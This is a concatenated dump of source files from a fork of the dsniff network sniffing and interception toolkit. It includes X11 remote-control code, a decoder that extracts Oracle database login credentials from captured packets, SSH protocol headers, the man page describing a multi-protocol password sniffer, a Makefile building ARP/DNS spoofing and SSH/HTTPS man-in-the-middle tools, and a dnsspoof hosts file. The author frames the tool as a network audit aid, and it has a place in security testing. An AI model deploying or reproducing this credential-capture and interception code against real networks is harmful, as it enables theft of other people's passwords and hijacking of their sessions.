expected version %s but found version\n" "\t%s (0x%x) instead.\n", progname, expected_mozilla_version, tenative_version, (unsigned int) tenative); #endif XFree (tenative_version); return tenative; } else if (result) { return result; } else { fprintf (stderr, "%s: not running on display %s\n", progname, DisplayString (dpy)); exit (1); } } static void mozilla_remote_check_window (Display *dpy, Window window) { Atom type; int format; unsigned long nitems, bytesafter; unsigned char *version = 0; int status = XGetWindowProperty (dpy, window, XA_MOZILLA_VERSION, 0, (65536 / sizeof (long)), False, XA_STRING, &type, &format, &nitems, &bytesafter, &version); if (status != Success || !version) { fprintf (stderr, "%s: window 0x%x is not a Netscape window.\n", progname, (unsigned int) window); exit (6); } else if (strcmp ((char *) version, expected_mozilla_version)) { fprintf (stderr, "%s: warning: window 0x%x is Netscape version %s;\n" "\texpected version %s.\n", progname, (unsigned int) window, version, expected_mozilla_version); } XFree (version); } static char *lock_data = 0; static void mozilla_remote_obtain_lock (Display *dpy, Window window) { Bool locked = False; Bool waited = False; if (! lock_data) { lock_data = (char *) malloc (255); sprintf (lock_data, "pid%d@", getpid ()); if (gethostname (lock_data + strlen (lock_data), 100)) { perror ("gethostname"); exit (-1); } } do { int result; Atom actual_type; int actual_format; unsigned long nitems, bytes_after; unsigned char *data = 0; XGrabServer (dpy); /* ################################# DANGER! */ result = XGetWindowProperty (dpy, window, XA_MOZILLA_LOCK, 0, (65536 / sizeof (long)), False, /* don't delete */ XA_STRING, &actual_type, &actual_format, &nitems, &bytes_after, &data); if (result != Success || actual_type == None) { /* It's not now locked - lock it. */ #ifdef DEBUG_PROPS fprintf (stderr, "%s: (writing " MOZILLA_LOCK_PROP " \"%s\" to 0x%x)\n", progname, lock_data, (unsigned int) window); #endif XChangeProperty (dpy, window, XA_MOZILLA_LOCK, XA_STRING, 8, PropModeReplace, (unsigned char *) lock_data, strlen (lock_data)); locked = True; } XUngrabServer (dpy); /* ################################# danger over */ XSync (dpy, False); if (! locked) { /* We tried to grab the lock this time, and failed because someone else is holding it already. So, wait for a PropertyDelete event to come in, and try again. */ fprintf (stderr, "%s: window 0x%x is locked by %s; waiting...\n", progname, (unsigned int) window, data); waited = True; while (1) { XEvent event; XNextEvent (dpy, &event); if (event.xany.type == DestroyNotify && event.xdestroywindow.window == window) { fprintf (stderr, "%s: window 0x%x unexpectedly destroyed.\n", progname, (unsigned int) window); exit (6); } else if (event.xany.type == PropertyNotify && event.xproperty.state == PropertyDelete && event.xproperty.window == window && event.xproperty.atom == XA_MOZILLA_LOCK) { /* Ok! Someone deleted their lock, so now we can try again. */ #ifdef DEBUG_PROPS fprintf (stderr, "%s: (0x%x unlocked, trying again...)\n", progname, (unsigned int) window); #endif break; } } } if (data) XFree (data); } while (! locked); if (waited) fprintf (stderr, "%s: obtained lock.\n", progname); } static void mozilla_remote_free_lock (Display *dpy, Window window) { int result; Atom actual_type; int actual_format; unsigned long nitems, bytes_after; unsigned char *data = 0; #ifdef DEBUG_PROPS fprintf (stderr, "%s: (deleting " MOZILLA_LOCK_PROP " \"%s\" from 0x%x)\n", progname, lock_data, (unsigned int) window); #endif result = XGetWindowProperty (dpy, window, XA_MOZILLA_LOCK, 0, (65536 / sizeof (long)), True, /* atomic delete after */ XA_STRING, &actual_type, &actual_format, &nitems, &bytes_after, &data); if (result != Success) { fprintf (stderr, "%s: unable to read and delete " MOZILLA_LOCK_PROP " property\n", progname); return; } else if (!data || !*data) { fprintf (stderr, "%s: invalid data on " MOZILLA_LOCK_PROP " of window 0x%x.\n", progname, (unsigned int) window); return; } else if (strcmp ((char *) data, lock_data)) { fprintf (stderr, "%s: " MOZILLA_LOCK_PROP " was stolen! Expected \"%s\", saw \"%s\"!\n", progname, lock_data, data); return; } if (data) XFree (data); } static int mozilla_remote_command (Display *dpy, Window window, const char *command, Bool raise_p) { int result = 0; Bool done = False; char *new_command = 0; /* The -noraise option is implemented by passing a "noraise" argument to each command to which it should apply. */ if (! raise_p) { char *close; new_command = (char *) malloc (strlen (command) + 20); strcpy (new_command, command); close = strrchr (new_command, ')'); if (close) strcpy (close, ", noraise)"); else strcat (new_command, "(noraise)"); command = new_command; } #ifdef DEBUG_PROPS fprintf (stderr, "%s: (writing " MOZILLA_COMMAND_PROP " \"%s\" to 0x%x)\n", progname, command, (unsigned int) window); #endif XChangeProperty (dpy, window, XA_MOZILLA_COMMAND, XA_STRING, 8, PropModeReplace, (unsigned char *) command, strlen (command)); while (!done) { XEvent event; XNextEvent (dpy, &event); if (event.xany.type == DestroyNotify && event.xdestroywindow.window == window) { /* Print to warn user...*/ fprintf (stderr, "%s: window 0x%x was destroyed.\n", progname, (unsigned int) window); result = 6; goto DONE; } else if (event.xany.type == PropertyNotify && event.xproperty.state == PropertyNewValue && event.xproperty.window == window && event.xproperty.atom == XA_MOZILLA_RESPONSE) { Atom actual_type; int actual_format; unsigned long nitems, bytes_after; unsigned char *data = 0; result = XGetWindowProperty (dpy, window, XA_MOZILLA_RESPONSE, 0, (65536 / sizeof (long)), True, /* atomic delete after */ XA_STRING, &actual_type, &actual_format, &nitems, &bytes_after, &data); #ifdef DEBUG_PROPS if (result == Success && data && *data) { fprintf (stderr, "%s: (server sent " MOZILLA_RESPONSE_PROP " \"%s\" to 0x%x.)\n", progname, data, (unsigned int) window); } #endif if (result != Success) { fprintf (stderr, "%s: failed reading " MOZILLA_RESPONSE_PROP " from window 0x%0x.\n", progname, (unsigned int) window); result = 6; done = True; } else if (!data || strlen((char *) data) < 5) { fprintf (stderr, "%s: invalid data on " MOZILLA_RESPONSE_PROP " property of window 0x%0x.\n", progname, (unsigned int) window); result = 6; done = True; } else if (*data == '1') /* positive preliminary reply */ { fprintf (stderr, "%s: %s\n", progname, data + 4); /* keep going */ done = False; } #if 1 else if (!strncmp ((char *)data, "200", 3)) /* positive completion */ { result = 0; done = True; } #endif else if (*data == '2') /* positive completion */ { fprintf (stderr, "%s: %s\n", progname, data + 4); result = 0; done = True; } else if (*data == '3') /* positive intermediate reply */ { fprintf (stderr, "%s: internal error: " "server wants more information? (%s)\n", progname, data); result = 3; done = True; } else if (*data == '4' || /* transient negative completion */ *data == '5') /* permanent negative completion */ { fprintf (stderr, "%s: %s\n", progname, data + 4); result = (*data - '0'); done = True; } else { fprintf (stderr, "%s: unrecognised " MOZILLA_RESPONSE_PROP " from window 0x%x: %s\n", progname, (unsigned int) window, data); result = 6; done = True; } if (data) XFree (data); } #ifdef DEBUG_PROPS else if (event.xany.type == PropertyNotify && event.xproperty.window == window && event.xproperty.state == PropertyDelete && event.xproperty.atom == XA_MOZILLA_COMMAND) { fprintf (stderr, "%s: (server 0x%x has accepted " MOZILLA_COMMAND_PROP ".)\n", progname, (unsigned int) window); } #endif /* DEBUG_PROPS */ } DONE: if (new_command) free (new_command); return result; } int mozilla_remote_commands (Display *dpy, Window window, char **commands) { Bool raise_p = True; int status = 0; mozilla_remote_init_atoms (dpy); if (window == 0) window = mozilla_remote_find_window (dpy); else mozilla_remote_check_window (dpy, window); XSelectInput (dpy, window, (PropertyChangeMask|StructureNotifyMask)); mozilla_remote_obtain_lock (dpy, window); while (*commands) { if (!strcmp (*commands, "-raise")) raise_p = True; else if (!strcmp (*commands, "-noraise")) raise_p = False; else status = mozilla_remote_command (dpy, window, *commands, raise_p); if (status != 0) break; commands++; } /* When status = 6, it means the window has been destroyed */ /* It is invalid to free the lock when window is destroyed. */ if ( status != 6 ) mozilla_remote_free_lock (dpy, window); return status; } #ifdef STANDALONE static void usage (void) { fprintf (stderr, "usage: %s [ options ... ]\n\ where options include:\n\ \n\ -help to show this message.\n\ -display to specify the X server to use.\n\ -remote to execute a command in an already-running\n\ Netscape process. See the manual for a\n\ list of valid commands.\n\ -id the id of an X window to which the -remote\n\ commands should be sent; if unspecified,\n\ the first window found will be used.\n\ -raise whether following -remote commands should\n\ cause the window to raise itself to the top\n\ (this is the default.)\n\ -noraise the opposite of -raise: following -remote\n\ commands will not auto-raise the window.\n\ ", progname); } void main (int argc, char **argv) { Display *dpy; char *dpy_string = 0; char **remote_commands = 0; int remote_command_count = 0; int remote_command_size = 0; unsigned long remote_window = 0; Bool sync_p = False; int i; progname = strrchr (argv[0], '/'); if (progname) progname++; else progname = argv[0]; /* Hack the -help and -version arguments before opening the display. */ for (i = 1; i < argc; i++) { if (!strcasecmp (argv [i], "-h") || !strcasecmp (argv [i], "-help")) { usage (); exit (0); } else if (!strcmp (argv [i], "-d") || !strcmp (argv [i], "-dpy") || !strcmp (argv [i], "-disp") || !strcmp (argv [i], "-display")) { i++; dpy_string = argv [i]; } else if (!strcmp (argv [i], "-sync") || !strcmp (argv [i], "-synchronize")) { sync_p = True; } else if (!strcmp (argv [i], "-remote")) { if (remote_command_count == remote_command_size) { remote_command_size += 20; remote_commands = (remote_commands ? realloc (remote_commands, remote_command_size * sizeof (char *)) : calloc (remote_command_size, sizeof (char *))); } i++; if (!argv[i] || *argv[i] == '-' || *argv[i] == 0) { fprintf (stderr, "%s: invalid `-remote' option \"%s\"\n", progname, argv[i] ? argv[i] : ""); usage (); exit (-1); } remote_commands [remote_command_count++] = argv[i]; } else if (!strcmp (argv [i], "-raise") || !strcmp (argv [i], "-noraise")) { char *r = argv [i]; if (remote_command_count == remote_command_size) { remote_command_size += 20; remote_commands = (remote_commands ? realloc (remote_commands, remote_command_size * sizeof (char *)) : calloc (remote_command_size, sizeof (char *))); } remote_commands [remote_command_count++] = r; } else if (!strcmp (argv [i], "-id")) { char c; if (remote_command_count > 0) { fprintf (stderr, "%s: the `-id' option must precede all `-remote' options.\n", progname); usage (); exit (-1); } else if (remote_window != 0) { fprintf (stderr, "%s: only one `-id' option may be used.\n", progname); usage (); exit (-1); } i++; if (argv[i] && 1 == sscanf (argv[i], " %ld %c", &remote_window, &c)) ; else if (argv[i] && 1 == sscanf (argv[i], " 0x%lx %c", &remote_window, &c)) ; else { fprintf (stderr, "%s: invalid `-id' option \"%s\"\n", progname, argv[i] ? argv[i] : ""); usage (); exit (-1); } } } dpy = XOpenDisplay (dpy_string); if (! dpy) exit (-1); if (sync_p) XSynchronize (dpy, True); exit (mozilla_remote_commands (dpy, (Window) remote_window, remote_commands)); } #endif /* STANDALONE */ hackerschoice-dsniff-a17510d/trigger.h0000664000175000017500000000155715105626144017636 0ustar epsilonepsilon/* * trigger.h * * Trigger interface. * * Copyright (c) 2000 Dug Song * * $Id: trigger.h,v 1.5 2001/03/15 08:33:06 dugsong Exp $ */ #ifndef TRIGGER_H #define TRIGGER_H #define TRIGGER_TCP_RAW_TIMEOUT 10 void trigger_init_list(char *list); void trigger_init_magic(char *filename); void trigger_init_services(char *filename); void trigger_dump(void); int trigger_set_ip(int proto, char *name); int trigger_set_udp(int port, char *name); int trigger_set_tcp(int port, char *name); int trigger_set_rpc(int program, char *name); void trigger_ip(struct libnet_ipv4_hdr *ip); void trigger_udp(struct libnet_ipv4_hdr *ip); void trigger_tcp(struct tcp_stream *ts, void **conn_save); void trigger_tcp_raw(struct libnet_ipv4_hdr *ip); void trigger_tcp_raw_timeout(int signal); void trigger_rpc(int program, int proto, int port); #endif /* TRIGGER_H */ hackerschoice-dsniff-a17510d/decode_oracle.c0000664000175000017500000000264015105626144020730 0ustar epsilonepsilon/* * decode_oracle.c * * Oracle SQL*Net v2/Net8. * * Copyright (c) 2000 Dug Song * * $Id: decode_oracle.c,v 1.6 2001/03/15 08:33:01 dugsong Exp $ */ #include "config.h" #include #include #include #include "decode.h" /* XXX - dag nasty. anyone have protocol specs? */ int decode_oracle(u_char *buf, int len, u_char *obuf, int olen) { u_char *p, *q; u_short i, j; int gotauth = 0; p = buf; i = pntohs(p); if (i >= len) return (0); if (i < 60) { /* XXX - skip unknown "empty" packet */ p += i; i = pntohs(p); if (p + i > buf + len) return (0); } /* Save TNS connect string. */ p[i] = '\0'; for (q = p + i; q > p && q[-1] != '\0'; q--) ; snprintf(obuf, olen, "%s\n", q); p += i; /* XXX - skip initial username message. */ if ((p = bufbuf(p, len, "(TNS V", 6)) == NULL) return (0); if ((i = len - (p - buf)) <= 0) return (0); if ((p = memchr(p, ')', i)) == NULL) return (0); /* Parse auth messages. */ for (p++; p - buf < len; p += i) { i = pntohs(p); if (p + i > buf + len || i < 120) break; if (memcmp(p + 4, "\x06\x00\x00\x00\x00\x00\x03\x3a", 8) != 0) continue; for (q = p + i; q > p && q[-1] != '\0'; q--) ; j = pntohs(p + 19); if (q + j > buf + len) return (0); q[j] = '\0'; j = strlen(obuf); snprintf(obuf + j, olen + j, "%s\n", p + 117); gotauth++; } return (gotauth ? strlen(obuf) : 0); } hackerschoice-dsniff-a17510d/ssh.h0000664000175000017500000000263215105626144016763 0ustar epsilonepsilon/* * ssh.h * * Minimal SSH-1 protocol implementation. * * Copyright (c) 2000 Dug Song * * $Id: ssh.h,v 1.3 2001/03/15 08:33:06 dugsong Exp $ */ #ifndef SSH_H #define SSH_H #define SSH_MAX_PADLEN 8 #define SSH_MAX_PKTLEN 262144 /* Authentication types. */ #define SSH_AUTH_PASSWORD 3 /* Cipher types. */ #define SSH_CIPHER_NONE 0 #define SSH_CIPHER_3DES 3 #define SSH_CIPHER_BLOWFISH 6 /* Message types. */ #define SSH_MSG_DISCONNECT 1 #define SSH_SMSG_PUBLIC_KEY 2 #define SSH_CMSG_SESSION_KEY 3 #define SSH_CMSG_USER 4 #define SSH_CMSG_AUTH_PASSWORD 9 #define SSH_SMSG_SUCCESS 14 #define SSH_SMSG_FAILURE 15 #define SSH_CMSG_STDIN_DATA 16 #define SSH_SMSG_STDOUT_DATA 17 #define SSH_SMSG_STDERR_DATA 18 #define SSH_SMSG_EXITSTATUS 20 typedef struct ssh_ctx { int authmask; int encmask; RSA *servkey; RSA *hostkey; } SSH_CTX; typedef struct ssh { int fd; SSH_CTX *ctx; u_char sesskey[32]; void *estate; void *dstate; void (*encrypt)(u_char *src, u_char *dst, int len, void *state); void (*decrypt)(u_char *src, u_char *dst, int len, void *state); } SSH; void SSH_init(void); SSH_CTX *SSH_CTX_new(void); SSH *SSH_new(SSH_CTX *ctx); void SSH_set_fd(SSH *ssh, int fd); int SSH_accept(SSH *ssh); int SSH_connect(SSH *ssh); int SSH_recv(SSH *ssh, u_char *buf, int size); int SSH_send(SSH *ssh, u_char *buf, int len); void SSH_close(SSH *ssh); #endif /* SSH_H */ hackerschoice-dsniff-a17510d/dsniff.80000664000175000017500000000651215105626144017360 0ustar epsilonepsilon.TH DSNIFF 8 .ad .fi .SH NAME dsniff \- password sniffer .SH SYNOPSIS .na .nf .fi \fBdsniff\fR [\fB-v\fR] [\fB-c\fR] [\fB-a\fR] [\fB-d\fR] [\fB-m\fR] [\fB-D\fR] [\fB-N\fR] [\fB-P\fR] [\fB-i \fIinterface\fR | \fB-p \fIpcapfile\fR] [\fB-s \fIsnaplen\fR] [\fB-M \fImagics\fR] [\fB-f \fIservices\fR] [\fB-t \fItrigger[,...]\fR] [\fB-r\fR|\fB-w\fR \fIsavefile\fR] [\fIexpression\fR] .SH DESCRIPTION .ad .fi \fBdsniff\fR is a password sniffer which handles FTP, Telnet, SMTP, HTTP, POP, poppass, NNTP, IMAP, SNMP, LDAP, Rlogin, RIP, OSPF, PPTP MS-CHAP, NFS, VRRP, YP/NIS, SOCKS, X11, CVS, IRC, AIM, ICQ, Napster, PostgreSQL, Meeting Maker, Citrix ICA, Symantec pcAnywhere, NAI Sniffer, Microsoft SMB, Oracle SQL*Net, Sybase and Microsoft SQL protocols. .LP \fBdsniff\fR automatically detects and minimally parses each application protocol, only saving the interesting bits, and uses Berkeley DB as its output file format, only logging unique authentication attempts. Full TCP/IP reassembly is provided by libnids(3). .LP I wrote \fBdsniff\fR with honest intentions - to audit my own network, and to demonstrate the insecurity of cleartext network protocols. Please do not abuse this software. .SH OPTIONS .IP \fB-c\fR Perform half-duplex TCP stream reassembly, to handle asymmetrically routed traffic (such as when using arpspoof(8) to intercept client traffic bound for the local gateway). .IP \fB-v\fR Verbose. Show banners. .IP \fB-a\fR Show all results. Otherwise dsniff tries not to show to many duplicates. .IP \fB-d\fR Enable debugging mode. .IP \fB-m\fR Force protocol detection/DPI also on known services. For example, -m will detect SSH _and_ HTTPS on port 443. .IP \fB-N\fR Resolve IP addresses to hostnames. .IP \fB-P\fR Enable promisc mode. .IP \fB-C\fR Force color output even if not a tty. .IP \fB-D\fR Disable DPI. Only decode known services (DPI is enabled by default on unknown ports). .IP "\fB-i \fIinterface\fR" Specify the interface to listen on. .IP "\fB-p \fIpcapfile\fR" Rather than processing the contents of packets observed upon the network process the given PCAP capture file. .IP "\fB-s \fIsnaplen\fR" Analyze at most the first \fIsnaplen\fR bytes of each TCP connection, rather than the default of 1024. .IP "\fB-f \fIservices\fR" Load triggers from a \fIservices\fR file. Default is to use internal. .IP "\fB-M \fImagicfile\fR" Load \fImagics\fR from file. Default is to use internal. Can not be used with \fI-t\fR. .IP "\fB-t \fItrigger\fR[,...]" Load triggers from a comma-separated list, specified as \fIport\fR/\fIproto\fR=\fIservice\fR (e.g. 80/tcp=http). .IP "\fB-r \fIsavefile\fR" Read sniffed sessions from a \fIsavefile\fR created with the \fB-w\fR option. .IP "\fB-w \fIfile\fR" Write sniffed sessions to \fIsavefile\fR rather than parsing and printing them out. .IP "\fIexpression\fR" Specify a tcpdump(8) filter expression to select traffic to sniff. .LP On a hangup signal \fBdsniff\fR will dump its current trigger table to \fIdsniff.services\fR. .SH FILES .IP \fI/usr/share/dsniff/dsniff.services\fR Default trigger table .IP \fI/usr/share/dsniff/dsniff.magic\fR Network protocol magic .SH "SEE ALSO" arpspoof(8), libnids(3), services(5), magic(5) .SH AUTHOR .na .nf Dug Song .SH BUGS \fBdsniff\fR's automatic protocol detection feature is based on the classic file(1) command by Ian Darwin, and shares its historical limitations and bugs. hackerschoice-dsniff-a17510d/Makefile.in0000664000175000017500000001360415105626144020063 0ustar epsilonepsilon# Makefile for dsniff # # Dug Song # # $Id: Makefile.in,v 1.42 2001/03/15 08:34:42 dugsong Exp $ srcdir = @srcdir@ VPATH = @srcdir@ install_prefix = prefix = @prefix@ exec_prefix = @exec_prefix@ libdir = $(prefix)/share/dsniff sbindir = @sbindir@ mandir = @mandir@ VER=2.5a2 CC = @CC@ CFLAGS = @CFLAGS@ -DDSNIFF_LIBDIR=\"$(libdir)/\" -I/usr/include/tirpc -DVERSION=\"$(VER)\" CPPFLAGS = @CPPFLAGS@ LDFLAGS = @LDFLAGS_STATIC@ @LDFLAGS@ PCAPINC = @PCAPINC@ PCAPLIB = @PCAPLIB@ @X_IBVERBS_LIB@ LNETINC = @LNETINC@ LNETLIB = @LNETLIB@ NIDSINC = @NIDSINC@ NIDSLIB = @NIDSLIB@ DBINC = @DBINC@ DBLIB = @DBLIB@ SSLINC = @SSLINC@ SSLLIB = @SSLLIB@ X11INC = @X_CFLAGS@ X11LIB = @X_LIBS@ @X_PRE_LIBS@ -lXmu -lX11 @X_EXTRA_LIBS@ TIRPCLIB = @X_TIRPC_LIB@ INCS = -I. $(NIDSINC) $(PCAPINC) $(LNETINC) $(DBINC) $(SSLINC) $(X11INC) -I$(srcdir)/missing LIBS = @LIBS@ -L$(srcdir) -lmissing INSTALL = @INSTALL@ INSTALL_PROGRAM = @INSTALL_PROGRAM@ INSTALL_DATA = @INSTALL_DATA@ RANLIB = @RANLIB@ HDRS = asn1.h base64.h buf.h common.h decode.h hex.h magic.h options.h \ pathnames.h pcaputil.h record.h rpc.h tcp_raw.h trigger.h \ vroot.h env2argv.h dsniff_services.h dsniff_magic.h \ crc32.h SRCS = asn1.c base64.c buf.c hex.c magic.c mount.c pcaputil.c rpc.c \ tcp_raw.c trigger.c record.c decode.c decode_aim.c \ decode_citrix.c decode_cvs.c decode_ftp.c decode_hex.c \ decode_http.c decode_icq.c decode_imap.c decode_irc.c \ decode_ldap.c decode_mmxp.c decode_mountd.c decode_napster.c \ decode_nntp.c decode_oracle.c decode_ospf.c decode_pcanywhere.c \ decode_pop.c decode_portmap.c decode_postgresql.c decode_pptp.c \ decode_rip.c decode_rlogin.c decode_smb.c decode_smtp.c \ decode_sniffer.c decode_snmp.c decode_socks.c decode_tds.c \ decode_telnet.c decode_ssh.c decode_sni.c decode_vrrp.c decode_yp.c decode_x11.c \ env2argv.c crc32.c SRCS_EXTRA = arpspoof.c dsniff.c DIST_EXTRA = configure.ac configure Makefile.in config.h.in install-sh mount.x nfs_prot.x GEN = mount.h mount.c nfs_prot.h nfs_prot.c OBJS = $(SRCS:.c=.o) LIBOBJS = dummy.o @LIBOBJS@ PROGS = arpspoof dnsspoof dsniff filesnarf macof mailsnarf msgsnarf \ sshmitm sshow tcpkill tcpnice @TCPHIJACK@ urlsnarf webmitm @WEBSPY@ CONFIGS = dsniff.magic dsniff.services dnsspoof.hosts .c.o: $(CC) $(CFLAGS) $(CPPFLAGS) $(INCS) -c $(srcdir)/$*.c all: $(PROGS) mount.h: mount.x rpcgen -h mount.x >mount.h mount.c: mount.x rpcgen -c mount.x >mount.c mount.o: mount.h decode_mountd.o: mount.h nfs_prot.h: nfs_prot.x rpcgen -h nfs_prot.x >nfs_prot.h nfs_prot.c: nfs_prot.x rpcgen -c nfs_prot.x >nfs_prot.c nfs_prot.o: nfs_prot.h filesnarf.o: nfs_prot.h gen: $(GEN) $(LIBOBJS): $(CC) $(CFLAGS) $(CPPFLAGS) $(INCS) -c $(srcdir)/missing/$*.c libmissing.a: $(LIBOBJS) ar -cr $@ $(LIBOBJS) $(RANLIB) $@ dsniff: $(HDRS) $(SRCS) dsniff.o $(OBJS) libmissing.a $(CC) $(LDFLAGS) -o $@ dsniff.o $(OBJS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) $(DBLIB) $(SSLLIB) $(TIRPCLIB) $(LIBS) arpspoof: arpspoof.o arp.o libmissing.a $(CC) $(LDFLAGS) -o $@ arpspoof.o arp.o $(PCAPLIB) $(LNETLIB) $(LIBS) dnsspoof: dnsspoof.o pcaputil.o libmissing.a $(CC) $(LDFLAGS) -o $@ dnsspoof.o pcaputil.o $(PCAPLIB) $(LNETLIB) $(LIBS) filesnarf: nfs_prot.o filesnarf.o pcaputil.o rpc.o libmissing.a $(CC) $(LDFLAGS) -o $@ filesnarf.o nfs_prot.o pcaputil.o rpc.o $(NIDSLIB) $(PCAPLIB) $(LNETLIB) $(TIRPCLIB) $(LIBS) macof: macof.o libmissing.a $(CC) $(LDFLAGS) -o $@ macof.o $(PCAPLIB) $(LNETLIB) $(LIBS) mailsnarf: mailsnarf.o buf.o pcaputil.o libmissing.a $(CC) $(LDFLAGS) -o $@ mailsnarf.o buf.o pcaputil.o $(NIDSLIB) $(PCAPLIB) $(LNETLIB) $(LIBS) msgsnarf: msgsnarf.o buf.o pcaputil.o libmissing.a $(CC) $(LDFLAGS) -o $@ msgsnarf.o buf.o pcaputil.o $(NIDSLIB) $(PCAPLIB) $(LNETLIB) $(LIBS) sshmitm: sshmitm.o $(OBJS) ssh.o sshcrypto.o libmissing.a $(CC) $(LDFLAGS) -o $@ sshmitm.o ssh.o sshcrypto.o $(OBJS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) $(DBLIB) $(SSLLIB) $(TIRPCLIB) $(LIBS) sshow: sshow.o pcaputil.o libmissing.a $(CC) $(LDFLAGS) -o $@ sshow.o pcaputil.o $(NIDSLIB) $(PCAPLIB) $(LNETLIB) $(LIBS) tcpkill: tcpkill.o pcaputil.o libmissing.a $(CC) $(LDFLAGS) -o $@ tcpkill.o pcaputil.o $(PCAPLIB) $(LNETLIB) $(LIBS) tcpnice: tcpnice.o pcaputil.o libmissing.a $(CC) $(LDFLAGS) -o $@ tcpnice.o pcaputil.o $(PCAPLIB) $(LNETLIB) $(LIBS) tcphijack: tcphijack.o pcaputil.o libmissing.a $(CC) $(LDFLAGS) -o $@ tcphijack.o pcaputil.o $(PCAPLIB) $(LNETLIB) $(LIBS) urlsnarf: urlsnarf.o base64.o buf.o pcaputil.o libmissing.a $(CC) $(LDFLAGS) -o $@ urlsnarf.o base64.o buf.o pcaputil.o $(NIDSLIB) $(PCAPLIB) $(LNETLIB) $(LIBS) webmitm: webmitm.o $(OBJS) libmissing.a $(CC) $(LDFLAGS) -o $@ webmitm.o $(OBJS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) $(DBLIB) $(SSLLIB) $(TIRPCLIB) $(LIBS) webspy: webspy.o base64.o buf.o remote.o libmissing.a $(CC) $(LDFLAGS) -o $@ webspy.o base64.o buf.o remote.o $(NIDSLIB) $(PCAPLIB) $(LNETLIB) $(X11LIB) $(LIBS) install: test -d $(install_prefix)$(sbindir) || \ $(INSTALL) -d $(install_prefix)$(sbindir) for file in $(PROGS); do \ $(INSTALL_PROGRAM) -m 755 $$file $(install_prefix)$(sbindir); \ done test -d $(install_prefix)$(libdir) || \ $(INSTALL) -d $(install_prefix)$(libdir) for file in $(CONFIGS); do \ $(INSTALL_DATA) $$file $(install_prefix)$(libdir); \ done test -d $(install_prefix)$(mandir)/man8 || \ $(INSTALL) -d $(install_prefix)$(mandir)/man8 for file in *.8; do \ $(INSTALL_DATA) $$file $(install_prefix)$(mandir)/man8; \ done clean: rm -f *.o *~ libmissing.a $(PROGS) webmitm.crt dist: -rm -rf dsniff-$(VER) mkdir -p dsniff-$(VER)/missing/sys cp -a $(SRCS) $(DIST_EXTRA) $(SRCS_EXTRA) $(HDRS) $(CONFIGS) dsniff-$(VER) cp -a missing/*.[ch] dsniff-$(VER)/missing cp -a missing/sys/*.[ch] dsniff-$(VER)/missing/sys tar cfz dsniff-$(VER).tar.gz dsniff-$(VER) distclean: clean rm -f Makefile $(GEN) config.h config.cache config.log config.status # EOF hackerschoice-dsniff-a17510d/dnsspoof.hosts0000664000175000017500000000216015105626144020726 0ustar epsilonepsilon# $Id: dnsspoof.hosts,v 1.2 2000/08/28 13:28:21 dugsong Exp $ # # Sample hosts file for dnsspoof - kill web banner ads for Niels. :-) # 127.0.0.1 ad.* 127.0.0.1 ads*.* 127.0.0.1 adbot*.* 127.0.0.1 adcount*.* 127.0.0.1 adfinity*.* 127.0.0.1 adforce*.* 127.0.0.1 adimage*.* 127.0.0.1 adlink*.* 127.0.0.1 adserv*.* 127.0.0.1 adremote*.* 127.0.0.1 adv.* 127.0.0.1 advert*.* 127.0.0.1 banner*.* 127.0.0.1 count*.* 127.0.0.1 promo*.* 127.0.0.1 werbung*.* 127.0.0.1 *ads*.*.com 127.0.0.1 *.adbot.com 127.0.0.1 *.adone.com 127.0.0.1 *.adforce.com 127.0.0.1 *.ad-up.com 127.0.0.1 *.advert*.* 127.0.0.1 *.banner*.* 127.0.0.1 *.bfast.com 127.0.0.1 *.burstnet.com 127.0.0.1 *.doubleclick.net 127.0.0.1 *.focalink.com 127.0.0.1 *.flycast.com 127.0.0.1 *.freestats.com 127.0.0.1 *.hitbox.com 127.0.0.1 *.globaltrack.com 127.0.0.1 *.globaltrak.net 127.0.0.1 *.imagine-inc.com 127.0.0.1 *.imgis.com 127.0.0.1 *.link*.com 127.0.0.1 *.memory.net 127.0.0.1 *.preferences.com 127.0.0.1 *.smartclicks.com 127.0.0.1 *.sponsorpool.net 127.0.0.1 *.stats.net 127.0.0.1 *.stattrax.com 127.0.0.1 *.*tracker.com 127.0.0.1 *.valueclick.com 127.0.0.1 *.wisewire.com hackerschoice-dsniff-a17510d/decode.c0000664000175000017500000001746615105626144017417 0ustar epsilonepsilon/* * decode.c * * Copyright (c) 2000 Dug Song * * $Id: decode.c,v 1.13 2001/03/15 08:32:59 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include "base64.h" #include "options.h" #include "decode.h" #include "crc32.h" extern int decode_hex(u_char *, int, u_char *, int); extern int decode_ftp(u_char *, int, u_char *, int); extern int decode_ssh(u_char *, int, u_char *, int); extern int decode_telnet(u_char *, int, u_char *, int); extern int decode_smtp(u_char *, int, u_char *, int); extern int decode_pptp(u_char *, int, u_char *, int); extern int decode_http(u_char *, int, u_char *, int); extern int decode_ospf(u_char *, int, u_char *, int); extern int decode_poppass(u_char *, int, u_char *, int); extern int decode_pop(u_char *, int, u_char *, int); extern int decode_nntp(u_char *, int, u_char *, int); extern int decode_smb(u_char *, int, u_char *, int); extern int decode_imap(u_char *, int, u_char *, int); extern int decode_snmp(u_char *, int, u_char *, int); extern int decode_ldap(u_char *, int, u_char *, int); extern int decode_mmxp(u_char *, int, u_char *, int); extern int decode_sni(u_char *, int, u_char *, int); extern int decode_rlogin(u_char *, int, u_char *, int); extern int decode_rip(u_char *, int, u_char *, int); extern int decode_socks(u_char *, int, u_char *, int); extern int decode_citrix(u_char *, int, u_char *, int); extern int decode_oracle(u_char *, int, u_char *, int); extern int decode_tds(u_char *, int, u_char *, int); extern int decode_sniffer(u_char *, int, u_char *, int); extern int decode_cvs(u_char *, int, u_char *, int); extern int decode_icq(u_char *, int, u_char *, int); extern int decode_napster(u_char *, int, u_char *, int); extern int decode_aim(u_char *, int, u_char *, int); extern int decode_postgresql(u_char *, int, u_char *, int); extern int decode_pcanywhere(u_char *, int, u_char *, int); extern int decode_x11(u_char *, int, u_char *, int); extern int decode_irc(u_char *, int, u_char *, int); extern int decode_portmap(u_char *, int, u_char *, int); extern int decode_mountd(u_char *, int, u_char *, int); extern int decode_vrrp(u_char *, int, u_char *, int); extern int decode_ypserv(u_char *, int, u_char *, int); extern int decode_yppasswd(u_char *, int, u_char *, int); static struct decode decodes[] = { { "hex", decode_hex }, { "ftp", decode_ftp }, { "ssh", decode_ssh }, { "telnet", decode_telnet }, { "smtp", decode_smtp }, { "pptp", decode_pptp }, { "http", decode_http }, { "ospf", decode_ospf }, { "poppass", decode_poppass }, { "pop2", decode_pop }, { "pop3", decode_pop }, { "nntp", decode_nntp }, { "smb", decode_smb }, { "imap", 